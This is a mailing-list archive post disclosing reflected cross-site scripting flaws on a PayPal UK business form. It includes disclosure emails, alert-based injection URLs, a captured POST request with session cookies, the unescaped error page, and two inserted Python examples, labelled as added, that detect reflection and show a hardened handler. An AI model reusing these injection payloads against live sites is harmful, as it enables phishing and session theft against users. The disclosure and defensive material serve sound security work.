Full Disclosure mailing list archives

Paypal Vulnerabilities 7/2010
From: Dunno Dunno <infosecspecialist () yahoo co uk>
Date: Fri, 22 Oct 2010 01:39:56 +0100 (BST)

Multiple Cross Site Vulnerabilities have been identified on Paypal's systems, on 
Friday, 2/7/2010. 

Multiple vulnerabilities have been disclosed to Paypal by Leading Security 
Expert "Lemonais Nicholas of AISecurity", following a brief telephone 
conversation with the Paypal security departments. The Paypal team impressed 
with their absolute cooperation and professionalism, and their policy of 
encouraging responsible and consensus vulnerability disclosure.


From: "ppelce () paypal co uk" <ppelce () paypal co uk>
To: infosecspecialist () yahoo co uk
Sent: Thu, 15 July, 2010 10:47:27
Subject: PayPal's Office of Executive Escalations (KMM73645347I96L0KM) :ppk4
15 July 2010

Reference number: 218234

Dear Sirs,
Thank you for your recent email dated 07 July to the offices of PayPal. 
Additionally, I would like to apologise for the delay in responding to your
inquiry regarding your PayPal account.
I would like to thank you for taking the time to contact our Site Security 
team regarding your concerns. I can confirm that they are the correct team 
to work with you on any potential vulnerability that you may have found.
PayPal is a strong believer in responsible disclosure of vulnerabilities to
service providers, and has provided a framework for handling disclosure of 
issues.  Please refer to the PayPal Responsible Disclosure Policy 
documented here: 

https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside
You can also be assured the feedback you have provided in your recent 
correspondence has been taken on board and I can assure you that our 
technical and content teams have been made aware of the concerns raised.
At PayPal we value your feedback. It helps us improve our business and 
serve you better, and we thank you for taking the time to contact us. 
Should you have any further queries on this matter, please feel free to 
email us at ppelce () paypal co uk 
Yours sincerely,
Cianan
Executive Escalations
PayPal
Copyright © 1999-2010 PayPal. All rights reserved. PayPal (Europe) S.à r.l.
et Cie, S.C.A. Société en Commandite par Actions. Registered Office: 22-24 
Boulevard Royal, L-2449, Luxembourg, RCS Luxembourg B 118 349

From: Dunno Dunno <infosecspecialist () yahoo co uk>
To: sitesecurity () paypal com
Sent: Tue, 6 July, 2010 23:08:49
Subject: Fw: Paypal Web vulnerability in raw source. _recipients variable does not validate input and the _requiredFields.

Dear gentlemen,
 
All usual cross site scripts in theory could be applied to variables.
 
Within the paypal enterprise, please do make sure that for any 'variable' in 
either Javascript, or Ruby, or any web language the 'input' is sanitised. 
Therefore, in the main xclick business variable on paypal.com, make sure the 
search string is sanitised.
 
Please read below for more details.
 
 
For any help, please do not hesitate to call me for more details :)
 
 
Thanks,
 
N.Y 

----- Forwarded Message ----
From: Dunno Dunno <infosecspecialist () yahoo co uk>
To: sitesecurity () paypal com;
Sent: Tue, 6 July, 2010 23:03:14
Subject: Paypal Web vulnerability in raw source. _recipients variable does not validate input and the _requiredFields.

Dear Sirs,
 
Further to our conversation, here are the details of the 'possible' 
vulnerability on your website. Although I have not carried out further 
investigation of the bug, just by being led to the website through a Google 
search and viewing the source legitimately, the accidental bug could be of great 
importance, as a user could masquerade to perform future phishing attacks by 
fooling a legitimately logged-in user from another Paypal site within the 
enterprise.
 
1) https://www.paypal.com/xclick/business=<script> alert("xss"); </script>
 
Possible Vulnerability:
 
https://www.paypal-business.co.uk:443/scripts/formmail.asp 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
 <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
 <title>Form Mail</title>
 <style type="text/css">
  body
  {
   background-color: #ffffff;
   color: #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
  }
  
  table
  {
   border: solid 1px #000000;
   border-collapse: collapse;
  }
  
  td, th
  {
   border: solid 1px #000000;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 10pt;
   padding: 2px 8px;
  }
  
  th
  {
   background-color: #c0c0c0;
  }
  
  .error
  {
   color: #c00000;
  }
 </style>
</head>
<body>
 <p class="error">
 Form could not be processed due to the following errors:</p>
 <ul>
  <li class="error">No referer.</li>
 
  <li class="error">Missing value for 1<script>alert("IS this safe?")</script></li>
  >>> the script does not sanitise input
 </ul>
 <p><a href="#" onclick="history.go(-1); return false;">Back</a></p>
</body> 
</html>

POST https://www.paypal-business.co.uk:443/scripts/formmail.asp HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.paypal-business.co.uk
Content-Length: 1517
Cookie: ASPSESSIONIDQCQDTCSQ=ALPHGCCCOIAOIKJJOGDLCDBM;ASPSESSIONIDCARASASR=OAMFEECCLCLNKPIHFIHBECEC;s_sess=%20s_cc%3Dtrue%3B
Connection: Close
Pragma: no-cache

_recipients=1<script>alert("IS THIS SAFE AND SECURE?")</script>&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=firstName%2ClastName%2CemailAddress%2CjobTitle&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=111-222-1933email () address tst&lastName=111-222-1933email () address tst&DisplayedPayPalAccountHolder=yes&DisplayedHasTransactionalSite=yes&DisplayedProductUsed=Website%20Payments%20Pro&DisplayedCorrectLogo=yes&DisplayedLogoOnHomepage=yes&DisplayedLogoOnProduct=yes&DisplayedLogoOnPayment=yes&DisplayedEstimatedSiteLaunch=less%20than%201%20month&DisplayedEcommerceSolution=yes&DisplayedProvider=123%2Ereg&Company=Paypal&Address1=000-123-4933eml () add xxx&Address2=111-222-1933email () address tst&DisplayedCountry=United%20Kingdom&Postcode=111-222-1933email () address tst&CompanyTel=111-222-1933email () address tst&CompanyURL=111-222-1933email () address tst&Email=sample%40email%2Etst&estimatedSiteLaunch=%3C%25%3DestimatedSiteLaunch%20%25%3E&country=%3C%25%3Dcountry%20%25%3E&productUsed=%3C%25%3DproductUsed%20%25%3E&paypalAccountHolder=%3C%25%3DpaypalAccountHolder%20%25%3E&hasTransactionalSite=%3C%25%3DhasTransactionalSite%20%25%3E&ecommerceSolution=%3C%25%3DecommerceSolution%20%25%3E&provider=%3C%25%3Dprovider%20%25%3E&correctLogo=%3C%25%3DcorrectLogo%20%25%3E&logoOnHomePage=%3C%25%3DlogoOnHomePage%20%25%3E&logoOnProductPages=%3C%25%3DlogoOnProductPages%20%25%3E&logoOnPaymentPages=%3C%25%3DlogoOnPaymentPages%20%25%3E
E
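The check a practitioner would run on an exchange like the one above, as an added example that is not part of the original post and not PayPal code: parse the form POST, look for each submitted value in the response, and report the parameters that come back verbatim rather than HTML-escaped. The request body and the two response pages are constructed samples modelled on the captured request and error page; the parameter names are the ones from the post, while the example.invalid host and the sample values are assumptions.

```python
# Added example, not part of the original post or of any PayPal code: given a
# captured form POST and the HTML that came back, list the parameters whose
# value was echoed without HTML escaping. Field names mirror the post
# (_recipients, _requiredFields, ...); the bodies are constructed samples.
import html
from urllib.parse import parse_qs

# Constructed request body, percent-encoded as a browser would send it.
# The _recipients payload differs from the _requiredFields one so the check can
# show which of the two is actually reflected.
SAMPLE_BODY = (
    "_recipients=1%3Cscript%3Ealert%28%22A%22%29%3C%2Fscript%3E"
    "&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup"
    "&_requiredFields=1%3Cscript%3Ealert%28%22is+this+safe%22%29%3C%2Fscript%3E"
    "&_redirectUrl=https%3A%2F%2Fwww.example.invalid%2Fthankyou.htm"
    "&firstName=Nick&emailAddress=sample%40email.tst"
)

# Constructed error page modelled on the one quoted in the post: the handler
# reports the missing required field by pasting its name into the HTML.
SAMPLE_RESPONSE_RAW = """<ul>
 <li class="error">No referer.</li>
 <li class="error">Missing value for 1<script>alert("is this safe")</script></li>
</ul>"""

# The same page as a correctly escaping handler would render it.
SAMPLE_RESPONSE_ESCAPED = """<ul>
 <li class="error">No referer.</li>
 <li class="error">Missing value for 1&lt;script&gt;alert(&quot;is this safe&quot;)&lt;/script&gt;</li>
</ul>"""


def reflected_unescaped(body: str, response: str) -> list:
    """Names of parameters whose decoded value appears verbatim in the response.

    Values without HTML metacharacters are skipped: a plain word being echoed
    proves nothing about escaping. A value that appears only in escaped form
    is not reported.
    """
    params = parse_qs(body, keep_blank_values=True)
    hits = set()
    for name, values in params.items():
        for value in values:
            if not any(c in value for c in "<>\"'&"):
                continue
            escaped = html.escape(value, quote=True)
            if value in response and escaped not in response:
                hits.add(name)
    return sorted(hits)


if __name__ == "__main__":
    print("reflected unescaped:", reflected_unescaped(SAMPLE_BODY, SAMPLE_RESPONSE_RAW))
    print("after escaping:", reflected_unescaped(SAMPLE_BODY, SAMPLE_RESPONSE_ESCAPED))
```

Against the raw error page only _requiredFields is reported, since that is the value the "Missing value for" message pastes back; the _recipients payload never appears in the response, so it is correctly left out. Against the escaped page nothing is reported, which is the result to expect after a fix.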

Subject: New vulnerability discovered.
From: Dunno Dunno <infosecspecialist () yahoo co uk>
To: sitesecurity () paypal com

--------------------------------------------------------------------------------
Dear Sirs,
 
A vulnerability was realised accidentally whilst casually browsing the 
website and through a search engine redirection of results to PayPal Business 
UK. The report was made on 02/07/2010.
 
The security issue looks like an XSS scripting attack, whereby an attacker could 
execute an .xss script on the user, or redirect to a third-party website where 
an xss backdoor or an xss cookie grabber could be installed. The attack could be 
further encoded to fool legitimate users of PayPal through a phishing attack, or 
with the execution of illegal scripts on legitimate users. The script could also 
potentially be used for spam emailing, or for further access to other PayPal 
domains, if controlled.
 
The vulnerability occurs on an ASP form on the PayPal UK website. 
 
Affected URL:  
https://www.paypal-business.co.uk:443/scripts/formmail.asp/?_recipients=jONOrbeton%40paypal%2Ecom%2C%20ahicks%40paypal%2Ecom&_subject=Business%20Hub%20Form%3A%20Sign%20up%20for%20Newsgroup&_requiredFields=1<script>alert("is this safe")</script>&_redirectUrl=https%3A%2F%2Fwww%2Epaypal-business%2Eco%2Euk%2Finformation-for-developers%2Ffrm_thankyou%2Ehtm&firstName=333-342-4533info () paypal com&lastName=331-123-5674infol () paypal com&emailAddress=331-542-2463infol () paypal com&jobTitle=A%20St

 
Please do also note that an <img src=.../../paypal.gif> onload, or a 
redirection to a third-party website pointing to an xss script, could also be 
possible.
 
 
We did try to get in touch with you, although the IT department announced a 
remedy for this bug. Please do also let me know if it is possible to post this 
message to a vulndev according to your public disclaimer for security.
 
The bug is of a similar nature to 
http://seclists.org/fulldisclosure/2010/Mar/488 

 
Thanks,
 
Nick.
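To show what the fix looks like for the two parameters named in these reports, here is an added example in Python that is not material from the original post and not PayPal's formmail.asp: a minimal form-mail handler with the unsafe error rendering next to a hardened version that allowlists _recipients, restricts _requiredFields names to identifiers and escapes them when echoed, and only redirects within the site. ALLOWED_RECIPIENTS, SITE_HOST, the example.invalid and attacker.invalid hosts and the two sample submissions are assumptions for illustration.

```python
# Added example, not part of the original post and not PayPal's formmail.asp:
# a minimal form-mail handler showing the reflected-XSS pattern described in
# the reports next to a hardened version. ALLOWED_RECIPIENTS, SITE_HOST, the
# hosts and the sample submissions are assumptions for illustration.
import html
import re
from urllib.parse import urlsplit

# Assumed server-side configuration; a real deployment loads this from config,
# never from the request.
ALLOWED_RECIPIENTS = {"forms@example.invalid"}
SITE_HOST = "www.example.invalid"

# Required-field *names* must be identifiers; anything else is rejected outright.
FIELD_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,63}$")


def render_error_page(errors):
    """Render the error list. Callers must pass already-escaped strings."""
    items = "".join(f'<li class="error">{e}</li>' for e in errors)
    return f'<p class="error">Form could not be processed:</p><ul>{items}</ul>'


def formmail_vulnerable(params):
    """The pattern in the reports: a field name taken from _requiredFields is
    pasted into the error message unescaped, so a name such as
    1<script>alert(1)</script> goes back to the browser as markup."""
    errors = []
    for field in params.get("_requiredFields", "").split(","):
        if field and not params.get(field):
            errors.append("Missing value for " + field)  # unescaped: reflected XSS
    return render_error_page(errors)


def formmail_hardened(params):
    errors = []

    # _recipients: the client may only pick from the server-side allowlist, and
    # the submitted value is never echoed back, so it can neither be reflected
    # nor turn the handler into an open mail relay.
    recipients = [r.strip() for r in params.get("_recipients", "").split(",") if r.strip()]
    if not recipients or any(r not in ALLOWED_RECIPIENTS for r in recipients):
        errors.append("Invalid recipient.")

    # _requiredFields: names validated against a strict pattern, and still
    # HTML-escaped when echoed (defence in depth if the pattern is relaxed later).
    for field in params.get("_requiredFields", "").split(","):
        field = field.strip()
        if not field:
            continue
        if not FIELD_NAME.match(field):
            errors.append("Invalid required-field name.")
            continue
        if not params.get(field):
            errors.append("Missing value for " + html.escape(field, quote=True))

    # _redirectUrl: https on this host only, so the form cannot bounce a user
    # to a third-party page.
    redirect = params.get("_redirectUrl", "")
    if redirect:
        parts = urlsplit(redirect)
        if parts.scheme != "https" or parts.netloc != SITE_HOST:
            errors.append("Invalid redirect target.")

    return render_error_page(errors)


# Constructed inputs: one shaped like the request in the reports, one legitimate
# submission that merely forgot a field.
PAYLOAD = '1<script>alert("is this safe")</script>'
ATTACK = {
    "_recipients": "someone@example.invalid",
    "_requiredFields": PAYLOAD,
    "_redirectUrl": "https://attacker.invalid/phish.htm",
    "firstName": "Nick",
}
LEGIT_MISSING = {
    "_recipients": "forms@example.invalid",
    "_requiredFields": "firstName,lastName",
    "_redirectUrl": "https://www.example.invalid/thankyou.htm",
    "firstName": "Nick",
}

if __name__ == "__main__":
    print(formmail_vulnerable(ATTACK))
    print(formmail_hardened(ATTACK))
    print(formmail_hardened(LEGIT_MISSING))
```

Run stand-alone, the vulnerable handler returns the script tag inside the error list, while the hardened one rejects the recipient, the field name and the redirect target without echoing any of them, and still produces a normal "Missing value for lastName" message for the legitimate submission.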


      
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
